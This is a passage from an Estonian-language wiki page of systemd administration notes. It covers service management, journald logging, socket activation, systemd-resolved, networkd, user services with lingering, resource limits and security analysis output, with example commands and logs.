10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
✗ CapabilityBoundingSet=~CAP_SYS_PACCT Service may use acct() 0.1
✗ CapabilityBoundingSet=~CAP_KILL Service may send UNIX signals to arbitrary processes 0.1
✗ ProtectKernelLogs= Service may read from or write to the kernel log ring buffer 0.2
✗ CapabilityBoundingSet=~CAP_WAKE_ALARM Service may program timers that wake up the system 0.1
✗ CapabilityBoundingSet=~CAP_(DAC_*|FOWNER|IPC_OWNER) Service may override UNIX file/IPC permission checks 0.2
✗ ProtectControlGroups= Service may modify the control group file system 0.2
✗ CapabilityBoundingSet=~CAP_LINUX_IMMUTABLE Service may mark files immutable 0.1
✗ CapabilityBoundingSet=~CAP_IPC_LOCK Service may lock memory into RAM 0.1
✗ ProtectKernelModules= Service may load or read kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_SYS_MODULE Service may load kernel modules 0.2
✗ CapabilityBoundingSet=~CAP_BPF Service may load BPF programs 0.1
✗ CapabilityBoundingSet=~CAP_SYS_TTY_CONFIG Service may issue vhangup() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_BOOT Service may issue reboot() 0.1
✗ CapabilityBoundingSet=~CAP_SYS_CHROOT Service may issue chroot() 0.1
